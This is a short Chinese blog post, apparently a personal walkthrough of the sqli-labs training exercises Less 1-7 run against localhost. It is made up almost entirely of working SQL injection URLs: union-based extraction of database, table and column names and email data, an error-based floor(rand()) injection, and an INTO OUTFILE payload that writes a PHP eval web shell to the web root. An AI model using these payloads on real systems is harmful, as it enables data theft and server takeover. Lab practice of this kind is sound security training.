Dayu

sCRiPt n00b

sqli-labs writeup

sqli-labs writeup


less_1-4

  1. 加一个’,找到注入点:http://127.0.0.1/Less-1/?id=1'
  2. 猜列数:http://127.0.0.1/Less-1/?id=0' order by 4--+
  3. union查询:http://127.0.0.1/Less-1/?id=0' union select 1,2,3--+
  4. 爆库名:http://127.0.0.1/Less-1/?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata--+
  5. 爆表名:http://127.0.0.1/Less-1/?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
  6. 爆字段名:http://127.0.0.1/Less-1/?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='emails'--+
  7. 爆数据:http://127.0.0.1/Less-1/?id=0' union select 1,2,concat_ws(char(32,58,32),id,email_id) from emails--+

less_5-6

  1. 爆security表名: http://127.0.0.1/Less-5/?id=1' union select count(*), 1, concat(0x7e,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 0,1), 0x7e, floor(rand()*2)) as q from information_schema.tables group by q--+

  2. 爆emails列名:http://127.0.0.1/Less-5/?id=1' union select count(*), 1, concat(0x7e, (select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x656D61696C73 limit 0, 1), 0x7e, floor(rand()*2)) as q from information_schema.tables group by q--+

Less_7

  • 写文件:http://127.0.0.1/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST[dayu]);?>' into outfile '/var/www/html/shell.php'--+

Proudly powered by Hexo and Theme by Hacker
© 2019 大宇